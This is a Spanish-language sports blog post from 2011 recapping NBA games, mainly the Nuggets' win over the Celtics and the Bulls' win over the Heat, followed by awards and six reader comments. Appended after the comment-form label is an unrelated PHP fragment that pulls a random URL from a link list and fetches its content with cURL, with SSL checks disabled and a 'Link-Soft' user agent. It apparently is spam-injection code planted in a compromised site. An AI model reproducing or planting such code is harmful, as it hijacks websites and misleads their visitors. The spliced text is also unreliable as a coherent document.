La Crónica (24/02/2011)

25 de February de 2011 por TheDeerHunter

Termina la vorágine de acontecimientos que nos ha tenido en vilo estos días. Quien parpadeaba se lo perdía y no hemos tenido tiempo casi ni de respirar. Con vuestra inestimable ayuda aquí hemos podido contar casi todo lo ocurrido con extrema inmediatez… Anoche aún había alguien en directo informándonos acerca de la actuación de Bosh. Sin palabras.

No hemos tenido sosiego para asimilar tanta convulsión. Es un buen momento para reflexionar y os lanzo una pregunta: ¿Qué franquicia ha sido la vencedora del último tramo del período de traspasos? (deportivamente hablando)

Casi se agradece volver a lo cotidiano de la competición, más aún si únicamente tenemos que cubrir un par de partidos. Tocaba derrota para los dos máximos gallos del Este.

Los Celtics pagaron caro la audacia de Ainge (75-89). Echaron mucho de menos a Perkins y a Nate Robinson en Denver. Al primero trató de sustituirle Glen Davis, con el resultado de 14 rebotes de déficit; al segundo, volvía Delonte y no estuvo excesivamente mal pero nada comparable con la excelente compenetración que lograron “Shrek y Burro”. Un partido para olvidar de los verdes. Los Nuggets, enfrente, mostraron su recién adquirido potencial con su rotación de 10-11 buenas piezas. Kenyon Martin parece haber agradecido la marcha de Carmelo y fue el primera espada y el mejor de los suyos. Wilson Chandler cuajó un buen debut muy por encima del de Gallinari, que fue el titular. Nené, que finalmente se queda, JR Smith y Afflalo también superaron los dobles dígitos.

Los Heat cayeron en Chicago (89-93). Una derrota que empieza a hacerse asumible para cualquiera y más si una de las piezas del tridente te falla estrepitosamente como anoche lo hizo Bosh. Es el porcentaje más lamentable en tiro, con al menos 18 intentos que ocurre desde que lo logró un tal Mike Newlin para los Rockets en 1973. Poco más de un bochornoso 5%. A pesar de todo LeBron y Wade aún se empeñaron en amargarle la noche a unos Bulls que tampoco estuvieron excelsos y aún tuvieron la opción de empatar con un triple desesperado del “elegido”. Con todo no olvidemos que el margen de mejora de Noah puede ser un factor importante en un duelo que bien podría ser semifinal de conferencia y para nada está decidido.

PREMIOS

MVP: No hubo actuaciones supremas en los equipos victoriosos. Hubo un reparto de papeles bastante coral en ellos. Se lo daremos a Luol Deng, bailando con la más fea de la noche, registrando 20 puntos, 10 rebotes y 5 asistencias además del triple que certificó la victoria.

El rookie: No hubo mucha participación de rookies. Por eso Omer Asik puede optar hoy al premio con sus 21 buenos minutos defensivos que les dio a los Bulls, con 11 rebotes, 1 tapón y el mejor balance de su equipo con su persona en cancha (+17)

La sorpresa: Antaño quizás no hubiera supuesto tanta sorpresas, pero hoy en día resulta bastante alucinante que Kenyon Martin se coma a Garnett con 18-10, un tapón y una asistencia.

La decepción: Ya lo anticipásteis y lo hemos señalado en la crónica. Un jugador de la talla y el sueldo de Chris Bosh no puede permitirse un ridículo como el de anoche.

El mayor esfuerzo en vano: Si uno de los Beach Boys falla, los otros dos tienen que multiplicarse para encima probablemente perder. LeBron y Wade combinaron 63 puntos, 18 rebotes, 7 asistencias, 4 robos y un tapón.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Ru dice:
    #1

    Pensando en esa posible semi de conferencia,Heat – Bulls,¿quién se va a perder los PO en el este?lo que otros años era sinónimo de coñazo televisado este año barrunta como un espectáculo del bueno:Miami,Boston,Chicago,los irregulares Orlando…hasta los Knicks!!! jajaja

      Citar

  2. Txusma dice:
    #2

    Para mí los ganadores son los Thunder que se hacen con dos piezas que pueden resultar esenciales en Playoffs. Creo que ahora sí están preparados para pelear por todo en 2ª ronda y plantarse en la final de conferencia. Mucho cuidadito con ellos!

    Y evidentemente, los Blazers tb ganan pero pq han sabido aprovecharse de un equipo que buscaba liberar salario para empezar a reconstruir. De todas maneras, sólo les veo oportunidades de pasar de primera ronda si Roy llega totalmente sano a los Playoffs.

      Citar

  3. MagicJohnson32 dice:
    #3

    Difícilmente volverá Roy a estar sano jamás, así que no contaría yo con él de cara a los Playoffs. Como mucho, 25 minutos desde el banco.

    Qué bien se han movido los Thunder. A ver cómo funcionan pero un equipo Westbrook-Sefo-Durant-Ibaka-Perkins, con Nate y Harden desde el banco, va a ser muy duro, con un juego muy intenso, un dolor de cabeza para cualquiera.

    Juas, 1 de 18…

    Por cierto, los Heat han perdido sus cinco partidos contra Celtics y Bulls.

      Citar

  4. Denise dice:
    #4

    1 de 18 para un tío que juega a 3 metros del aro, jaja, este es el moemnto mandarinas más grande que recuerdo.
    Y cuando lleva un 1 de 10, no le da verguenza de dejar de tirar. El coach también podría haberle dicho algo.

      Citar

  5. Txusma dice:
    #5

    Y yo q pensaba que lo de Kenyon Martin era insuperable…

      Citar

  6. Denise dice:
    #6

    Cómoda victoria de L.A. ante unos mermados Clippers sin Gordon y sin sus nuevos fichajes (Mo Williams y Moon) que aguantaron hasta el descanso gracias a los triples de Foye, pero en el tercer cuarto apareció un tal Kobe (que se había marchado a los vestuarios en el 2º cuarto lesionado), finiquitó el partido con 18 puntos. Y el último cuarto fue ron 12 minutos de la basura sin Kobe, Pau y practicamente sin Griffin.
    Palizón de Orlando a Oklahoma con Howard haciendo lo que le da la gana.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>